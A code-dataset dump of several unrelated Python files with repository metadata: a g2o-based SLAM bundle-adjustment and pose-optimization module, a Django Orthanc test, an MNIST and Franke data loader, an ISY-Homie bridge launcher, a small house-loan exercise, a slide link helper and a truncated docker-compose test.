pointCloud = self._map.trackPointsList()
once = False
# construct graph
# set key frame as vertices
for i, frame in enumerate(frames):
cam = frame.camera
pose = None
if cam is None:
continue
pose = g2o.SE3Quat(cam.R0, cam.t0.reshape(3, ))
v_idx = self.vertex_seq_generate("Frame", frame.seq)
# only set the first frame as stational piont
# self.add_pose(v_idx, pose, False)#fixed=frame.seq == 1)
# when use ground truth
self.add_pose(v_idx, pose, fixed=frame.seq == 1)
if not once:
K = cam.K
focal_length = (K[0, 0] + K[1, 1]) / 2
pp = (K[0, 2], K[1, 2])
cam_p = g2o.CameraParameters(focal_length, pp, 0)
cam_p.set_id(0)
self.add_parameter(cam_p)
once = True
# set array of MapPoint as vertices
for _, point in pointCloud.items():
v = point.data # + np.random.randn(3)
v_idx = self.vertex_seq_generate("MapPoint", point.seq)
self.add_point(v_idx, v, marginalized=True)
# set edges
try:
observations = point.frames
except AttributeError:
observations = point.observations
for frame_key, pixel_pos in observations.items():
frame = self._map.findFrame(frame_key)
cam = frame.camera
if cam is None:
continue
key = (v_idx, self.indexOfVertex("Frame", frame_key))
e_idx = self.edge_seq_generate(key)
# measurement
px = frame.pixels[pixel_pos]
# @todo: TODO compute invSigma for : see ORBSlam implementation for details
invSigma = 1.
if not isinstance(key[1], int):
print("key[1]", key[1])
raise Exception("Wrong value!")
edge = self.add_edge(e_idx, key[0], key[1], px.data, # + np.random.randn(2),
information=np.identity(2) * invSigma)
# set camera parameters to compute reprojection error with measurements
cam = frame.camera
device = cam.device
# modify python/types/sba/type_six_dof_expmap.h#L81
#
# Projection using focal_length in x and y directions
# py::class_<EdgeSE3ProjectXYZ, BaseBinaryEdge<2, Vector2D, VertexSBAPointXYZ, VertexSE3Expmap>>(m, "EdgeSE3ProjectXYZ")
# .def(py::init<>())
# .def("compute_error", &EdgeSE3ProjectXYZ::computeError)
# .def("is_depth_positive", &EdgeSE3ProjectXYZ::isDepthPositive)
# .def("cam_project", &EdgeSE3ProjectXYZ::cam_project)
# + .def_readwrite("fx", &EdgeSE3ProjectXYZ::fx)
# + .def_readwrite("fy", &EdgeSE3ProjectXYZ::fy)
# + .def_readwrite("cx", &EdgeSE3ProjectXYZ::cx)
# + .def_readwrite("cy", &EdgeSE3ProjectXYZ::cy)
# ;
#
# edge.fx = device.fx
# edge.fy = device.fy
# edge.cx = device.cx
# edge.cy = device.cy
# check our modification is correct: I am not sure whether g2opy runs as expected so we check the result manually.
# used for EdgeSE3ProjectXYZ
# measurement = edge.cam_project( edge.vertex(1).estimate().map( edge.vertex(0).estimate() ) )
# print("Measurement: %s" % measurement)
# print("px: %s" % px.data)
# assert int(measurement[0]) == int(px.x) and int(measurement[1]) == int(px.y)
pass
if self.USE_LANDMARKS:
# treat landmark as stationary points group and compute key points from it
logging.info("Using landmarks for bundle adjustment ...")
# set landmarks as vertices
for _, landmark in landmarks.items():
# representing landmark as top centre point
logging.info("%s points size %d" % (landmark, len(landmark.points)))
# compute bbox
# Note: I just use AABB instead of OBB, because to estimate OBB we need dense points
# bbox = landmark.computeAABB()
# topCentre = bbox.topCentre()
# v = topCentre.data
centroid = landmark.Centroid()
v = centroid.data
v_idx = self.vertex_seq_generate("MapPoint", centroid.seq)
self.add_point(v_idx, v, marginalized=True)
# estimate measurement
# we suppose the positions (centers) of landmarks are stable, which will be used in PnP later
# @todo : TODO
# set edges
observations = landmark.observations
# choose an estimate pose
visited_pxes = {}
for (point_key, frame_seq), pixel_pos in observations.items():
point = pointCloud[point_key]
# frame = frames[frame_seq - 1]
frame = self._map.findFrame(frame_key)
cam = frame.camera
if cam is None:
continue
px_pose = point[frame_seq]
px = frame.pixels[pixel_pos]
if visited_pxes.get(frame_seq, None) is None:
visited_pxes = []
visited_pxes[frame_seq].append(px.data)
pass
for frame_seq, projected_pixels in visited_pxes:
reduced = reduce(lambda pre, cur: pre + cur, projected_pixels)
reduced /= len(projected_pixels)
key = (v_idx, self.indexOfVertex("Frame", frame_seq))
e_idx = self.edge_seq_generate(key)
# @todo: TODO compute invSigma for : see ORBSlam implementation for details
# I have little idea how this should be set
invSigma = 1.
edge = self.add_edge(self.vertexPair_edges[key], key[0], key[1], reduced,
information=np.identity(2) * invSigma)
# set camera parameters to compute reprojection error with measurements
cam = frame.camera
device = cam.device
# add camera parameters to compute reprojection errors
# edge.fx = device.fx
# edge.fy = device.fy
# edge.cx = device.cx
# edge.cy = device.cy
pass
pass
logging.info("Number of vertices:", len(self.vertices()))
logging.info("Number of edges:", len(self.edges()))
return self
def optimize(self, max_iterations=5, verbose=True):
super().initialize_optimization()
super().set_verbose(verbose)
super().optimize(max_iterations)
return self
# @todo :TODO
# pose: g2o.Isometry3d or g2o.SE3Quat
def add_pose(self, pose_id, pose, fixed=False):
v_se3 = g2o.VertexSE3Expmap()
v_se3.set_id(pose_id)
v_se3.set_fixed(fixed)
##
##
v_se3.set_estimate(pose.inverse())
super().add_vertex(v_se3)
return v_se3
# point: numpy array with shape=(3,), similar to Eigen::Vector3
def add_point(self, point_id, point, fixed=False, marginalized=True):
v_p = g2o.VertexSBAPointXYZ()
v_p.set_id(point_id)
v_p.set_estimate(point)
v_p.set_marginalized(marginalized)
v_p.set_fixed(fixed)
super().add_vertex(v_p)
return v_p
# @todo : TODO
def add_edge(self, edge_id, point_id, pose_id,
measurement,
information=np.identity(2),
robust_kernel=g2o.RobustKernelHuber(np.sqrt(5.991))):
# edge = g2o.EdgeSE3ProjectXYZ()
edge = g2o.EdgeProjectXYZ2UV()
edge.set_id(edge_id)
edge.set_vertex(0, self.vertex(point_id) )
edge.set_vertex(1, self.vertex(pose_id) )
edge.set_measurement(measurement)
edge.set_information(information)
if robust_kernel is not None:
edge.set_robust_kernel(robust_kernel)
edge.set_parameter_id(0,0)
super().add_edge(edge)
return edge
## == Used in mapping thread
class LocalBA(BundleAdjustment):
def __init__(self):
super().__init__()
#
self.frame = None
# all the points can be viewed by this frame
self.points = None
#
self.measurements = None
#
self.mappoints = []
#
self.local_key_frames = {}
#
self.Thr = 15
#
self.adjusted_frames = None
#
self.fixed_frames = None
def set_FromFrame(self, frame):
self.frame = frame
return self
def set_FromPoints(self, points):
self.points = points
return self
def set_FromMeasurements(self, measurements):
self.measurements = measurements
return self
# override
def Init(self):
adjusted, fixed = self.get_local_keyframes()
print("[LocalBA] %d adjusted frames" % len(adjusted))
print("[LocalBA] %d fixed frames" % len(fixed))
self.adjusted_frames = adjusted
self.fixed_frames = fixed
if len(adjusted) == 0:
print("Something wrong here ...")
pass
once = False
# construct graph
# set key frame as vertices
for i, frame in enumerate(adjusted):
cam = frame.camera
pose = None
if cam is None:
continue
pose = g2o.SE3Quat(cam.R0, cam.t0.reshape(3, ))
v_idx = self.vertex_seq_generate("Frame", frame.seq)
# only set the first frame as stational piont
# self.add_pose(v_idx, pose, False)#fixed=frame.seq == 1)
# when use ground truth
self.add_pose(v_idx, pose, fixed=False)
if not once:
K = cam.K
focal_length = (K[0, 0] + K[1, 1]) / 2
pp = (K[0, 2], K[1, 2])
cam_p = g2o.CameraParameters(focal_length, pp, 0)
cam_p.set_id(0)
self.add_parameter(cam_p)
once = True
pointCloud, Measurement = frame.get_measurements()
N = len(pointCloud)
for i in range(N):
point = pointCloud[i]
v = point.data # + np.random.randn(3)
v_idx = self.vertex_seq_generate("MapPoint", point.seq)
self.add_point(v_idx, v, marginalized=True)
# set edge
cam = frame.camera
if cam is None:
continue
key = (v_idx, self.indexOfVertex("Frame", frame.seq))
e_idx = self.edge_seq_generate(key)
# measurement
px = Measurement[i]
# @todo: TODO compute invSigma for : see ORBSlam implementation for details
invSigma = 1.
if not isinstance(key[1], int):
print("key[1]", key[1])
raise Exception("Wrong value!")
edge = self.add_edge(e_idx, key[0], key[1], px.data, # + np.random.randn(2),
information=np.identity(2) * invSigma)
self.mappoints.append((point, frame.seq, px))
# set camera parameters to compute reprojection error with measurements
cam = frame.camera
device = cam.device
# modify python/types/sba/type_six_dof_expmap.h#L81
#
# Projection using focal_length in x and y directions
# py::class_<EdgeSE3ProjectXYZ, BaseBinaryEdge<2, Vector2D, VertexSBAPointXYZ, VertexSE3Expmap>>(m, "EdgeSE3ProjectXYZ")
# .def(py::init<>())
# .def("compute_error", &EdgeSE3ProjectXYZ::computeError)
# .def("is_depth_positive", &EdgeSE3ProjectXYZ::isDepthPositive)
# .def("cam_project", &EdgeSE3ProjectXYZ::cam_project)
# + .def_readwrite("fx", &EdgeSE3ProjectXYZ::fx)
# + .def_readwrite("fy", &EdgeSE3ProjectXYZ::fy)
# + .def_readwrite("cx", &EdgeSE3ProjectXYZ::cx)
# + .def_readwrite("cy", &EdgeSE3ProjectXYZ::cy)
# ;
#
# edge.fx = device.fx
# edge.fy = device.fy
# edge.cx = device.cx
# edge.cy = device.cy
# ===== FIXED =====
for i, frame in enumerate(fixed):
cam = frame.camera
pose = None
if cam is None:
continue
pose = g2o.SE3Quat(cam.R0, cam.t0.reshape(3, ))
v_idx = self.vertex_seq_generate("Frame", frame.seq)
# only set the first frame as stational piont
# self.add_pose(v_idx, pose, False)#fixed=frame.seq == 1)
# when use ground truth
self.add_pose(v_idx, pose, fixed=True)
if not once:
K = cam.K
focal_length = (K[0, 0] + K[1, 1]) / 2
pp = (K[0, 2], K[1, 2])
cam_p = g2o.CameraParameters(focal_length, pp, 0)
cam_p.set_id(0)
self.add_parameter(cam_p)
once = True
pointCloud, Measurement = frame.get_measurements()
N = len(pointCloud)
for i in range(N):
point = pointCloud[i]
v = point.data # + np.random.randn(3)
v_idx = self.vertex_seq_generate("MapPoint", point.seq)
self.add_point(v_idx, v, marginalized=True)
# set edge
cam = frame.camera
if cam is None:
continue
key = (v_idx, self.indexOfVertex("Frame", frame.seq))
e_idx = self.edge_seq_generate(key)
# measurement
px = Measurement[i]
# @todo: TODO compute invSigma for : see ORBSlam implementation for details
invSigma = 1.
if not isinstance(key[1], int):
print("key[1]", key[1])
raise Exception("Wrong value!")
edge = self.add_edge(e_idx, key[0], key[1], px.data, # + np.random.randn(2),
information=np.identity(2) * invSigma)
self.mappoints.append((point, frame.seq, px))
# set camera parameters to compute reprojection error with measurements
cam = frame.camera
device = cam.device
# modify python/types/sba/type_six_dof_expmap.h#L81
#
# Projection using focal_length in x and y directions
# py::class_<EdgeSE3ProjectXYZ, BaseBinaryEdge<2, Vector2D, VertexSBAPointXYZ, VertexSE3Expmap>>(m, "EdgeSE3ProjectXYZ")
# .def(py::init<>())
# .def("compute_error", &EdgeSE3ProjectXYZ::computeError)
# .def("is_depth_positive", &EdgeSE3ProjectXYZ::isDepthPositive)
# .def("cam_project", &EdgeSE3ProjectXYZ::cam_project)
# + .def_readwrite("fx", &EdgeSE3ProjectXYZ::fx)
# + .def_readwrite("fy", &EdgeSE3ProjectXYZ::fy)
# + .def_readwrite("cx", &EdgeSE3ProjectXYZ::cx)
# + .def_readwrite("cy", &EdgeSE3ProjectXYZ::cy)
# ;
#
# edge.fx = device.fx
# edge.fy = device.fy
# edge.cx = device.cx
# edge.cy = device.cy
pass
def get_local_keyframes(self):
frames = self._map.get_active_frames()
pointCloud = self.points
adjusted = set()
fixed = set()
# select key frames
for _, point in pointCloud.items():
# observations = point.frames
# for frame_key, pixel_pos in observations.items(): # this only contains key points records
for frame in frames:
frame_key = frame.seq
camera = frame.camera
# print("viewing point %s using camera from Frame#%d" % (point, frame.seq))
cam_pt = camera.viewWorldPoint(point)
projection = camera.view(cam_pt)
if projection is None:
continue
if self.local_key_frames.get(frame_key, None) is None:
self.local_key_frames[frame_key] = 0
self.local_key_frames[frame_key] += 1
for frame_key, cnt in self.local_key_frames.items():
if cnt > self.Thr:
frame = self._map.findFrame(frame_key)
print("[LocalBA] add %s to adjusted" % frame)
adjusted.add(frame)
for frame in frames:
if frame not in adjusted:
print("[LocalBA] add %s to fixed" % frame)
fixed.add(frame)
return adjusted, fixed
# @todo : TODO
def EstimateError(self):
pass
# @todo : TODO
def UpdateMap(self):
landmarks = self._map.trackList()
for i, frame in enumerate(self.adjusted_frames):
cam = frame.camera
if cam is None:
continue
frame.update_pose(self.get_pose("Frame", frame.seq))
for point, frame_key, px in self.mappoints:
refined_point = self.get_point("MapPoint", point.seq)
# print("refined mappoint %s position:" % point, refined_point)
point.update(*refined_point)
if self.USE_LANDMARKS:
for _, landmark in landmarks.items():
centroid = landmark.Centroid()
refined_point = self.get_point("MapPoint", centroid.seq)
# print("refined landmark centroid %s position:" % centroid, refined_point)
centroid.update(*refined_point)
pass
pass
pass
## ===============================
class PoseOptimization(Optimizer):
def __init__(self):
super().__init__()
# g2o::BlockSlover_6_3(g2o::BlockSolver_6_3::LinearSolverType*)
linear_solver = g2o.BlockSolverSE3(g2o.LinearSolverCholmodSE3())
solver = g2o.OptimizationAlgorithmLevenberg(linear_solver)
super().set_algorithm(solver)
# additional parameters
terminate = g2o.SparseOptimizerTerminateAction()
terminate.set_gain_threshold(1e-6)
super().add_post_iteration_action(terminate)
#
self._map = None
#
self.frame = None
#
self.points = None
#
self.vSE3 = None
#
self.measurements = None
#
self.vertex_seq_generator = AtomicCounter()
self.edge_seq_generator = AtomicCounter()
# Point | Frame | Landmark -> Vertex mapping
# inverse vertex query
self._ivq = {}
# (Vertex, Vetex) -> Edge mapping, a sparse matrix
# inverse edges query
self._ieq = {}
#
self.USE_LANDMARKS = False
#
self.edges = []
def set_FromMap(self, map):
self._map = map
return self
def set_FromFrame(self, frame):
self.frame = frame
return self
def set_FromPoints(self, points):
self.points = points
return self
def set_FromMeasurements(self, measurements):
self.measurements = measurements
return self
# @todo : TODO
def Init(self):
pointCloud = self.points
measurements = self.measurements
once = False
# set current frame as vertex to be optimized
cam = self.frame.camera
if not once:
K = cam.K
focal_length = (K[0, 0] + K[1, 1]) / 2
pp = (K[0, 2], K[1, 2])
cam_p = g2o.CameraParameters(focal_length, pp, 0)
cam_p.set_id(0)
self.add_parameter(cam_p)
once = True
pose = g2o.SE3Quat(cam.R0, cam.t0.reshape(3, ))
v_idx = self.vertex_seq_generate("Frame", self.frame.seq)
self.vSE3 = self.add_pose(v_idx, pose, False)
# add point
# set array of MapPoint as vertices
for _, point in pointCloud.items():
v = point.data
v_idx = self.vertex_seq_generate("MapPoint", point.seq)
# We only optimize pose, it is also possible to use g2o::EdgeSE3ProjectXYZOnlyPose
self.add_point(v_idx, v, marginalized=True, fixed=True)
# viewed by the frame
key = (v_idx, self.indexOfVertex("Frame", self.frame.seq))
e_idx = self.edge_seq_generate(key)
# measurement
measurement = measurements[point.seq]
px = measurement.px2d2
# @todo: TODO compute invSigma for : see ORBSlam implementation for details
# I have little idea how this should be set
invSigma = 1.
edge = self.add_edge(e_idx, key[0], key[1], px.data,
information=np.identity(2) * invSigma)
#
device = self.frame.camera.device
# modify python/types/sba/type_six_dof_expmap.h#L81
#
# Projection using focal_length in x and y directions
# py::class_<EdgeSE3ProjectXYZ, BaseBinaryEdge<2, Vector2D, VertexSBAPointXYZ, VertexSE3Expmap>>(m, "EdgeSE3ProjectXYZ")
# .def(py::init<>())
# .def("compute_error", &EdgeSE3ProjectXYZ::computeError)
# .def("is_depth_positive", &EdgeSE3ProjectXYZ::isDepthPositive)
# .def("cam_project", &EdgeSE3ProjectXYZ::cam_project)
# + .def_readwrite("fx", &EdgeSE3ProjectXYZ::fx)
# + .def_readwrite("fy", &EdgeSE3ProjectXYZ::fy)
# + .def_readwrite("cx", &EdgeSE3ProjectXYZ::cx)
# + .def_readwrite("cy", &EdgeSE3ProjectXYZ::cy)
# ;
#
# edge.fx = device.fx
# edge.fy = device.fy
# edge.cx = device.cx
# edge.cy = device.cy
pass
# PoseOptimization converges very quickly ()
def optimize(self, max_iterations=5, verbose=True, level=None):
if level is not None:
super().initialize_optimization(level)
else:
super().initialize_optimization()
super().set_verbose(verbose)
super().optimize(max_iterations)
return self
#@todo : TDOO
def optimizeWhileFiltering(self):
MaxIter = 5
it = 0
vSE3 = self.vSE3
cam = self.frame.camera
outliers = {}
while it < MaxIter:
vSE3.set_estimate(g2o.SE3Quat(cam.R0, cam.t0.reshape(3, )))
self.optimize(level=it)
# @todo : TODO
# see ORBSlam PoseOptimization
pass
pass
def add_pose(self, pose_id, pose, fixed=False):
v_se3 = g2o.VertexSE3Expmap()
v_se3.set_id(pose_id)
v_se3.set_fixed(fixed)
v_se3.set_estimate(pose.inverse())
super().add_vertex(v_se3)
return v_se3
# point: numpy array with shape=(3,), similar to Eigen::Vector3
def add_point(self, point_id, point, fixed=False, marginalized=True):
v_p = g2o.VertexSBAPointXYZ()
v_p.set_id(point_id)
v_p.set_estimate(point)
v_p.set_marginalized(marginalized)
v_p.set_fixed(fixed)
super().add_vertex(v_p)
return v_p
# @todo : TODO
def add_edge(self, edge_id, point_id, pose_id,
measurement,
information=np.identity(2),
robust_kernel=g2o.RobustKernelHuber(np.sqrt(5.991))):
# edge = g2o.EdgeSE3ProjectXYZOnlyPose()
# edge = g2o.EdgeSE3ProjectXYZ()
edge = g2o.EdgeProjectXYZ2UV()
edge.set_id(edge_id)
edge.set_vertex(0, self.vertex(point_id))
edge.set_vertex(1, self.vertex(pose_id))
edge.set_measurement(measurement)
edge.set_information(information)
if robust_kernel is not None:
edge.set_robust_kernel(robust_kernel)
edge.set_parameter_id(0, 0)
super().add_edge(edge)
return edge
if __name__ == "__main__":
edge = g2o.EdgeSE3ProjectXYZ()
# edge = g2o.EdgeSE3ProjectXYZOnlyPose()
# passed!
print(edge.fx) | 31.926357 | 130 | 0.612298 |
a9d4d662dff18c26344425cc847a0cdca9ae154a | 372 | py | Python | app/tests/integration/test_orthanc_class.py | salimkanoun/Rest_Radiomics | eda8b2e7d0a95c0fe789bcf5758a4a1cef2c6996 | [
"MIT"
] | null | null | null | app/tests/integration/test_orthanc_class.py | salimkanoun/Rest_Radiomics | eda8b2e7d0a95c0fe789bcf5758a4a1cef2c6996 | [
"MIT"
] | 1 | 2021-06-21T19:38:00.000Z | 2021-06-21T19:38:00.000Z | app/tests/integration/test_orthanc_class.py | salimkanoun/Rest_Radiomics | eda8b2e7d0a95c0fe789bcf5758a4a1cef2c6996 | [
"MIT"
] | 2 | 2021-06-21T12:28:28.000Z | 2021-06-21T12:30:37.000Z | from django.test import TestCase
from ...gaelo_processing.models.Orthanc import Orthanc
class test_orthanc_class(TestCase):
def test_get_zip_from_orthanc(self):
ortanc_instance = Orthanc()
zip_path = ortanc_instance.get_zip_from_orthanc(
"3a84b7f7-d0c66087-d70b292e-0c585356-56b6ccb3")
print('test get_zip_from_orthanc validate') | 33.818182 | 59 | 0.75 |
c44f3760ccf9dfdc8bbe6f4e5e235c264d30339d | 7,446 | py | Python | Project2/nnreg/dataloader.py | marianylund/fysstkprojects | 7ef97cdf3356dad8ee931a19812d3b0f1625997b | [
"MIT"
] | null | null | null | Project2/nnreg/dataloader.py | marianylund/fysstkprojects | 7ef97cdf3356dad8ee931a19812d3b0f1625997b | [
"MIT"
] | null | null | null | Project2/nnreg/dataloader.py | marianylund/fysstkprojects | 7ef97cdf3356dad8ee931a19812d3b0f1625997b | [
"MIT"
] | null | null | null | import numpy as np
import mnist
from sklearn.model_selection import train_test_split
from RegLib.HelperFunctions import create_frankie_data, create_X, plot_values_with_info,plot_values_with_two_y_axis
from yacs.config import CfgNode as CN
class DataLoader():
"""
Contains X_train, X_test, y_train, y_test for the dataset given in the config.
Can also have X_val and y_val for other sets than franke, size depends on the the config
"""
def __init__(self, cfg: CN, perm_index = [-1], one_hot_encode = True):
self.data_name = cfg.DATA.NAME
if self.data_name == "franke":
self.load_franke_data(cfg, perm_index)
elif self.data_name == "mnist":
self.load_mnist_data(cfg, one_hot_encode)
else:
raise ValueError(self.data_name, " is not found in DataLoader init")
def load_franke_data(self, cfg: CN, perm_index):
x, y, z = create_frankie_data(cfg.SEED, cfg.DATA.FRANKIE.N, cfg.DATA.FRANKIE.NOISE)
X = create_X(x, y, cfg.DATA.FRANKIE.P)
self.split_and_scale_train_test(X, z, perm_index, test_size = cfg.TEST_SIZE)
return self
def load_mnist_data(self, cfg: CN, one_hot_encode = True):
val_percent = cfg.DATA.MNIST.VAL_PERCENT
binary_classes = cfg.DATA.MNIST.BINARY
num_of_classes = len(binary_classes)
if(num_of_classes != 0):
assert num_of_classes == 2, "Cannot have " + str(num_of_classes) + " classes"
X_train, self.y_train, X_val, self.y_val, X_test, self.y_test = load_binary_dataset(binary_classes[0], binary_classes[1], val_percent)
else:
X_train, self.y_train, X_val, self.y_val, X_test, self.y_test = load_full_mnist(val_percent)
# One hot encode the results
if one_hot_encode:
self.y_train = self.one_hot_encode(self.y_train, 10)
self.y_val = self.one_hot_encode(self.y_val, 10)
self.y_test = self.one_hot_encode(self.y_test, 10)
# Pre-process the batch
X_mean, X_std = (np.mean(X_train), np.std(X_train))
self.X_train = self.pre_process_images(X_train, X_mean, X_std)
self.X_val = self.pre_process_images(X_val, X_mean, X_std)
self.X_test = self.pre_process_images(X_test, X_mean, X_std)
def one_hot_encode(self, Y: np.ndarray, num_classes: int):
new_Y = np.zeros((Y.shape[0], num_classes))
for i in range(len(Y)):
new_Y[i][Y[i]] = 1
return new_Y
def pre_process_images(self, X: np.ndarray, X_mean: float, X_std: float):
assert X.shape[1] == 784,\
f"X.shape[1]: {X.shape[1]}, should be 784"
X = (X - X_mean) / X_std
X = np.c_[X, np.ones(X.shape[0])] # Apply bias trick
return X
def split_and_scale_train_test(self, X, y, perm_index = [-1], test_size = 0.2):
assert X.shape[0] == y.shape[0], ("X.shape[0] and y.shape[0] needs to be the same length, but: " + str(X.shape[0]) + " != " + str(y.shape[0]))
if(len(perm_index) > 1):
X = X[perm_index]
y = y[perm_index]
self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(X, y, test_size=test_size, shuffle=False)
self.X_train, self.X_val, self.y_train, self.y_val = train_test_split(self.X_train, self.y_train, test_size=0.25, shuffle = False)
self.X_train, self.X_test, self.X_val = self.scale_standard(self.X_train, self.X_test, self.X_val)
# Force the correct shape:
self.y_test.shape = (self.y_test.shape[0], 1)
self.y_train.shape = (self.y_train.shape[0], 1)
self.y_val.shape = (self.y_val.shape[0], 1)
return self
def scale_standard(self, train_data, test_data, val_data):
data_mean = np.mean(train_data[:,1:], axis = 0)
data_std = np.std(train_data[:,1:], axis = 0)
train_data_scaled = train_data
test_data_scaled = test_data
val_data_scaled = val_data
train_data_scaled[:,1:] = np.divide((train_data[:,1:] - data_mean), data_std)
test_data_scaled[:,1:] = np.divide((test_data[:,1:] - data_mean), data_std)
val_data_scaled[:,1:] = np.divide((val_data[:,1:] - data_mean), data_std)
return train_data_scaled, test_data_scaled, val_data_scaled
# https://github.com/hukkelas/TDT4265-StarterCode/tree/master/assignment1
def binary_prune_dataset(class1: int, class2: int,
X: np.ndarray, Y: np.ndarray):
"""
Splits the dataset into the class 1 and class2. All other classes are removed.
Args:
X: images of shape [batch size, 784] in the range (0, 255)
Y: labels of shape [batch size]
"""
mask1 = (Y == class1)
mask2 = (Y == class2)
mask_total = np.bitwise_or(mask1, mask2)
Y_binary = Y.copy()
Y_binary[mask1] = 1
Y_binary[mask2] = 0
return X[mask_total], Y_binary[mask_total]
def train_val_split(X: np.ndarray, Y: np.ndarray, val_percentage: float):
"""
Randomly splits the training dataset into a training and validation set.
"""
idx = np.arange(0, X.shape[0])
np.random.shuffle(idx)
train_size = int(X.shape[0] * (1 - val_percentage))
idx_train = idx[:train_size]
idx_val = idx[train_size:]
X_train, Y_train = X[idx_train], Y[idx_train]
X_val, Y_val = X[idx_val], Y[idx_val]
return X_train, Y_train, X_val, Y_val
def load_binary_dataset(class1: int, class2: int, val_percentage: float):
"""
Loads, prunes and splits the dataset into train, validation and test.
"""
train_size = 20000
test_size = 2000
X_train, Y_train, X_test, Y_test = mnist.load()
# First 20000 images from train set
X_train, Y_train = X_train[:train_size], Y_train[:train_size]
# Last 2000 images from test set
X_test, Y_test = X_test[-test_size:], Y_test[-test_size:]
X_train, Y_train = binary_prune_dataset(
class1, class2, X_train, Y_train
)
X_test, Y_test = binary_prune_dataset(
class1, class2, X_test, Y_test
)
# Reshape to (N, 1)
Y_train = Y_train.reshape(-1, 1)
Y_test = Y_test.reshape(-1, 1)
X_train, Y_train, X_val, Y_val = train_val_split(
X_train, Y_train, val_percentage
)
# print(f"Train shape: X: {X_train.shape}, Y: {Y_train.shape}")
# print(f"Validation shape: X: {X_val.shape}, Y: {Y_val.shape}")
# print(f"Test shape: X: {X_test.shape}, Y: {Y_test.shape}")
return X_train, Y_train, X_val, Y_val, X_test, Y_test
def load_full_mnist(val_percentage: float):
"""
Loads and splits the dataset into train, validation and test.
"""
train_size = 20000
test_size = 2000
X_train, Y_train, X_test, Y_test = mnist.load()
# First 20000 images from train set
X_train, Y_train = X_train[:train_size], Y_train[:train_size]
# Last 2000 images from test set
X_test, Y_test = X_test[-test_size:], Y_test[-test_size:]
# Reshape to (N, 1)
Y_train = Y_train.reshape(-1, 1)
Y_test = Y_test.reshape(-1, 1)
X_train, Y_train, X_val, Y_val = train_val_split(
X_train, Y_train, val_percentage
)
# print(f"Train shape: X: {X_train.shape}, Y: {Y_train.shape}")
# print(f"Validation shape: X: {X_val.shape}, Y: {Y_val.shape}")
# print(f"Test shape: X: {X_test.shape}, Y: {Y_test.shape}")
return X_train, Y_train, X_val, Y_val, X_test, Y_test | 40.912088 | 150 | 0.645044 |
6527548527556d6ab58f2e9bb1488746eda96e90 | 426 | py | Python | isy_homie_start.py | jspeckman/ISY-Homie-Bridge | 2bb952e5bfc07cb85e961654963c2f4e5e962aec | [
"MIT"
] | null | null | null | isy_homie_start.py | jspeckman/ISY-Homie-Bridge | 2bb952e5bfc07cb85e961654963c2f4e5e962aec | [
"MIT"
] | null | null | null | isy_homie_start.py | jspeckman/ISY-Homie-Bridge | 2bb952e5bfc07cb85e961654963c2f4e5e962aec | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import time
import yaml
from isy_homie.bridge import Bridge
with open("isy_homie.yml", 'r') as ymlfile:
cfg = yaml.full_load(ymlfile)
try:
bridge = Bridge (address=cfg['isy'] ['url'], username=cfg['isy'] ['username'],password=cfg['isy'] ['password'],mqtt_settings=cfg['mqtt'])
while True:
time.sleep(10)
except (KeyboardInterrupt, SystemExit):
print("Quitting.")
| 21.3 | 141 | 0.657277 |
c1bd69bd31fa9e5aadcd22b9bc5fe26e61350f4b | 547 | py | Python | Mundo 1/Ex36.py | legna7/Python | 52e0b642d1b7acc592ec82dd360c5697fb0765db | [
"MIT"
] | 2 | 2020-04-18T21:56:35.000Z | 2020-04-23T00:00:08.000Z | Mundo-2/desafio-036.py | LeonardoARGR/Desafios-Python-Curso-em-Video | 3fb1b0615fce88f968b5ba6e4bac43fcb0e72d98 | [
"MIT"
] | null | null | null | Mundo-2/desafio-036.py | LeonardoARGR/Desafios-Python-Curso-em-Video | 3fb1b0615fce88f968b5ba6e4bac43fcb0e72d98 | [
"MIT"
] | null | null | null | valordacasa = float(input('Qual é o valor da casa?: R$'))
salário = float(input('Qual o seu salário?: R$'))
anos = int(input('Por quantos anos você vai pagar a casa?: '))
print(f'Para pagar uma casa de R${valordacasa :.2f} em {anos} anos, a prestação mensal será de R${valordacasa / anos / 12 :.2f}')
if valordacasa / anos / 12 > salário * 30 / 100:
print(f'Desculpe, mas você não pode financiar essa casa, emprestimo NEGADO.')
elif valordacasa / anos / 12 <= salário * 30 / 100:
print(f'Você pode financiar a casa, emprestimo APROVADO.')
| 60.777778 | 129 | 0.687386 |
7b1f90135966bdbc366edeb69de7371f27fe38e9 | 1,232 | py | Python | Slides/Slide/Cell/Link.py | olesmith/SmtC | dfae5097f02192b60aae05b9d02404fcfe893be3 | [
"CC0-1.0"
] | null | null | null | Slides/Slide/Cell/Link.py | olesmith/SmtC | dfae5097f02192b60aae05b9d02404fcfe893be3 | [
"CC0-1.0"
] | null | null | null | Slides/Slide/Cell/Link.py | olesmith/SmtC | dfae5097f02192b60aae05b9d02404fcfe893be3 | [
"CC0-1.0"
] | null | null | null | import re,glob
class Slides_Slide_Cell_Link():
def Slide_Cell_Command_Detect_Args(self,command,content):
regexp='@'+command+'{'
args=[]
if ( re.search(regexp,content, re.IGNORECASE) ):
args=re.sub(regexp,"",content, flags=re.IGNORECASE)
args=re.sub('}\s*$',"",args)
args=re.compile("}{").split(args)
return args
def Slide_Cell_Link_Insert(self,content,paths):
args=self.Slide_Cell_Command_Detect_Args("Link",content)
if ( len(args)>=1):
filename=args[0]
title=filename
if ( len(args)>1 ):
title=args[1]
paths=[filename]
if (not re.search('^http(s)?://',filename)):
paths=[
"/cgi-bin/Download?File=/Slides",
]+paths+[filename]
uri="/".join(paths)
content=[
self.XML_Tags(
"A",
title,
{
"HREF": uri,
"TARGET": "_",
}
)
]
return self.Center(content)
| 25.666667 | 64 | 0.428571 |
184aff4de4071ccc660cdc8749d701a4bfadfa4d | 649 | py | Python | tests/unit/cli/docker_client_test.py | paulczar/compose | 02f119e4b728169a7c5ca1e5ee34a3e4adf4ca61 | [
"Apache-2.0"
] | null | null | null | tests/unit/cli/docker_client_test.py | paulczar/compose | 02f119e4b728169a7c5ca1e5ee34a3e4adf4ca61 | [
"Apache-2.0"
] | 1 | 2021-03-26T00:41:22.000Z | 2021-03-26T00:41:22.000Z | tests/unit/cli/docker_client_test.py | paulczar/compose | 02f119e4b728169a7c5ca1e5ee34a3e4adf4ca61 | [
"Apache-2.0"
] | null | null | null | from __future__ import unicode_literals
from __future__ import absolute_import
import os
import mock
from tests import unittest
from compose.cli import docker_client
class DockerClientTestCase(unittest.TestCase):
def test_docker_client_no_home(self):
with mock.patch.dict(os.environ):
del os.environ['HOME']
docker_client.docker_client()
def test_docker_client_with_custom_timeout(self):
with mock.patch.dict(os.environ):
